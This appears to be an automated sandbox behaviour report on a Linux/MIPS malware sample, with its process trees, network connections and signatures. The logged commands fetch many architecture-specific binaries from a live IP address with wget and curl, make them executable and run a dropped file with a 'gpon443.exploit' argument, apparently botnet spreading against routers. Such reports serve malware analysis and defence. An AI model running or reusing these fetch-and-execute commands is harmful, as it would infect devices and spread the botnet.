[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]

/bin/cat

[cat Meth.arm7]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]

/bin/cat

[cat Meth.ppc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]

/bin/cat

[cat Meth.m68k]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]

/bin/cat

[cat Meth.spc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]

/bin/cat

[cat Meth.i686]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]

/bin/cat

[cat Meth.sh4]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]

/bin/cat

[cat Meth.arc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

memory/685-1-0xb672b000-0xb673c044-memory.dmp

memory/724-2-0xb6725000-0xb6736044-memory.dmp

memory/738-3-0xb676b000-0xb677c044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-28 03:58

Reported

2024-07-29 11:33

Platform

debian9-mipsbe-20240729-en

Max time kernel

79s

Max time network

80s

Command Line

[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A
N/A /tmp/sn0rt /tmp/sn0rt N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sn0rt /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 N/A

Processes

/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118

[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]

/bin/cat

[cat Meth.x86]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]

/bin/cat

[cat Meth.mips]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]

/bin/cat

[cat Meth.mpsl]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]

/bin/cat

[cat Meth.arm]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]

/bin/cat

[cat Meth.arm5]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]

/bin/cat

[cat Meth.arm6]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]

/bin/cat

[cat Meth.arm7]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]

/bin/cat

[cat Meth.ppc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]

/bin/cat

[cat Meth.m68k]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]

/bin/cat

[cat Meth.spc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]

/bin/cat

[cat Meth.i686]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]

/bin/cat

[cat Meth.sh4]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]

/bin/cat

[cat Meth.arc]

/bin/chmod

[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]

/tmp/sn0rt

[./sn0rt gpon443.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A